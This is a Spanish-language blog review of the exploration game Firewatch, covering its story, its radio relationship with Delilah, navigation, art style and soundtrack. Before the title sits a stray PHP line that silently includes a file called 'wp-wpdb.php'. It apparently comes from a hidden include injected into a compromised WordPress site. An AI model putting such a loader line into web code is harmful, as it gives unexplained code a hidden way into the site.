if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Firewatch – La Fortaleza de LeChuck

Análisis Firewatch

Desarrollado por el estudio independiente Campo Santo en colaboración con Panic INCFirewatch es una aventura de exploración en primera persona un tanto simple, pero en su historia y en su libertad narrativa radica su encanto, y es uno de esos juegos que saben tocarte la fibra sensible si has pasado por una situación similar.

firewatch

Firewatch apuesta por una jugabilidad sencilla y centra todo su interés en el desarrollo personal de los personajes para que puedas crear tu los lazos en función de tu forma de ser, durante el juego habrá múltiples sucesos que pondrán a prueba nuestra cordura y la confianza entre los personajes como si de una novela de misterio se tratase.

Campo Santo ha apostado por historias y personajes realistas e imperfectos que tienen su encanto, y el hecho de que varios miembros de la primera temporada de The Walking Dead de Telltale hayan trabajado en el guión y que un miembro del equipo de Ori and The Blind Forest haya ayudado en el apartado artístico hacen que el juego esté muy lejos de ser un simple simulador de paseos.

El juego no dura mas de 4-5 horas en función de lo que nos paremos a explorar o a contemplar los bonitos paisajes que nos ofrece, y aunque parezca poco, realmente no necesita mucho más para desarrollar la historia, lo bueno si breve dos veces bueno.

EL PARQUE DE YELLOWSTONE

Firewatch empieza por ponernos en situación contándonos la bonita historia de amor entre Henry, el protagonista principal, y Julia, una chica que conoció en una fiesta en 1975, cuando Henry tenía unos 20 años. Mediante un sistema de textos y decisiones vamos creando la historia de esta pareja, todas estas decisiones tienen su peso dentro de la historia y a pesar de que muchas parezcan una tontería tienen su importancia dentro del juego.

Tras muchos años de relación, Julia sufre un trágico revés que afecta de sobremanera a ambas partes, tanto, que Henry se ve obligado a aceptar un puesto de trabajo como guardabosques en el parque de Yellowstone, y es aquí cuando el juego da comienzo. Nos situamos en el año 1989, casi un año después del gran incendio del 88 que dejó el parque cerrado durante bastantes meses, ahora está reabierto al público y nuestras labores son las de vigilar una parcela del parque para prevenir posibles incendios forestales y así evitar otro grave incidente.

Lo primero que hacemos nada más llegar al parque es visitar la que será nuestra torre de vigilancia y conocer a nuestra jefa, Delilah, que será la que nos ayude a acomodarnos en nuestro puesto y la que se encargará de gestionar y notificar las incidencias que vayamos viendo durante nuestra jornada laboral.

firewatch-2

La única forma que tendremos de contactar con ella será mediante nuestra radio personal ya que ella está vigilando otra parcela a una distancia considerable, durante nuestros paseos por el parque podremos hablar con ella y conocerla mejor, o no, eso depende de la relación que queramos entablar con ella, este es uno de los encantos del juego ya que si somos abiertos y amables tendremos una buena relación que puede sernos útil en determinados momentos del juego, mientras que mantener las distancias o ser muy borde nos creará problemas a la hora de interactuar con ella llegando incluso a no dirigirnos la palabra salvo en casos específicos, todos estos detalles afectan a la hora de desarrollar la historia y a los diálogos de los personajes, por lo tanto, el conocer detalles de tu jefa pueden serte muy útil en ciertos momentos de la trama mientras que el tener una red de comunicación abierta y de confianza puede ser vital en determinados momentos, de ti depende explorar y desarrollar la personalidad de Henry y de cómo éste trata a los que le rodean.

La psicología de los personajes es el punto fuerte del juego, cualquiera de los personajes puede ser sincero o mentir con las consecuencias que ello conlleva, realmente el juego no nos da mucho contexto previo ya que seremos nosotros los que debamos desarrollar toda la historia a nuestra manera poniendo atención a los muchos detalles que iremos viendo en nuestro día a día y a las muchas alternativas que se nos brindan.

firewatch-3

NUESTRO DÍA A DÍA

Nuestras labores principales dentro del parque serán las de verificar que no haya peligros de nuevos incendios, notificar las zonas peligrosas y evitar que los campistas causen muchos problemas. Las mecánicas del juego son bien sencillas, podremos movernos libremente por el parque si tenemos las herramientas y equipo adecuado independientemente de los objetivos, esto ha sido pensado para que cada uno elija la ruta que más le apetezca o la que le resulte más bonita.

Para poder movernos por el parque usaremos una brújula y un mapa que nos ayudarán a orientarnos y a encontrar rutas y vías accesibles a cada zona del terreno, y si os lo estáis preguntando, no, el juego no nos señalará el camino que tenemos que seguir con unas flechas ni nada, para darle más realismo y una mejor sensación de exploración habrá que tirar de orientación pura y dura, aunque si tendremos la posibilidad de ver en qué punto exacto del mapa estamos para evitar perdernos constantemente.

Normalmente el equipo especial lo iremos encontrando durante la historia principal, pero hay otros tantos que son opcionales y nos pueden ser de mucha ayuda en determinadas ocasiones, por todo el parque encontraremos diferentes cajas de suministros que tendrán entre otras cosas nueva información del lugar que actualizará el mapa con notas y señales para ver posibles caminos alternativos más rápidos y varios objetos coleccionables para dar pie a diferentes conversaciones con Delilah y conocerla mejor, si es lo que queremos.

firewatch-4

Otro de los detalles en los que Firewatch destaca es en su apartado artístico, los escenarios tienen unas líneas y diseños muy sencillos pero con una gran explosión de colores, el efecto de las luces por otra parte mejora considerablemente el conjunto de los escenarios y los hace especialmente bonitos en los atardeceres. Sí que es cierto que en texturas y otros detalles gráficos el juego no sobresale, pero el haber apostado por la sencillez en los efectos de luz y color ha sido la mejor decisión.

La banda sonora es algo escasa, y durante nuestra aventura no será habitual que haya música, los sonidos de la naturaleza y los animales predominan y ayudan a mejorar la sensación de aislamiento y tranquilidad que nos da el bosque salvo en ciertos momentos emotivos donde la banda sonora hace alarde de intensificar estas sensaciones.

Por el momento Firewatch solo viene con textos y voces en inglés, y salvo por alguna frase hecha no se necesita un alto nivel para entender que se está diciendo, aunque se espera que en los próximos meses estén disponibles los subtítulos al castellano para que el juego llegue a más gente.

firewatch-5

En conclusión, Firewatch es un juego muy recomendado para amantes de la exploración que no se conforman con un simple simulador de paseos. Además, ofrece un bonito entorno en el que pararse cada poco a admirar el paisaje y un sistema de relaciones humanas muy interesante que nos permitirá rejugarlo sin que parezca que estamos haciendo lo mismo otra vez.

Podéis adquirir el juego a buen precio para PC Steam en el siguiente enlace.